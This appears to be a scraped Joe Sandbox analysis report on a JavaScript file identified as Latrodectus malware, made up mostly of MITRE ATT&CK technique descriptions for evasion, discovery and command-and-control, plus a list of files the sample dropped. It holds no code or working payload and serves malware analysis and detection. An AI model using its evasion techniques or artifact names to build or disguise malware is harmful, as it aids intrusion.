Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Document_a19_79b555791-28h97348k5477-3219g9.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

:wtfbbq (copy)

C:\Config.Msi\3b3ac8.rbs

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

C:\Users\user\AppData\Local\sharepoint\360total.dll

C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll

C:\Users\user\AppData\Roaming\Custom_update\update_data.dat

C:\Windows\Installer\MSI39EE.tmp

C:\Windows\Installer\MSI3A4C.tmp

Windows Analysis Report
Document_a19_79b555791-28h97348k5477-3219g9.js

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre